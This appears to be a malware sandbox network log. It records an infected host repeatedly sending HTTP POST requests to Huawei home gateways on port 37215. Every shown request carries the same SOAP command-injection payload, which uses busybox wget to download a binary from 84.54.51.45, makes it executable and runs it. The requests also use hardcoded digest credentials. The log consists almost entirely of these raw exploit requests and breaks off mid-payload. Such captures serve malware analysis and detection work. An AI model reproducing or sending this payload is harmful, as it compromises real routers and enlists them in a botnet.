                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1090192.168.2.155205041.253.103.9237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173057079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1091192.168.2.155489241.117.142.2137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173096895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1092192.168.2.154777441.6.223.21637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173134089 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1093192.168.2.155603641.179.186.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173146009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1094192.168.2.154321441.218.58.17837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173167944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1095192.168.2.155705641.245.65.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173202038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1096192.168.2.153786841.207.75.17937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173219919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1097192.168.2.155528041.188.192.7037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173253059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1098192.168.2.153296441.97.10.11637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173270941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1099192.168.2.154968641.118.58.10237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173301935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 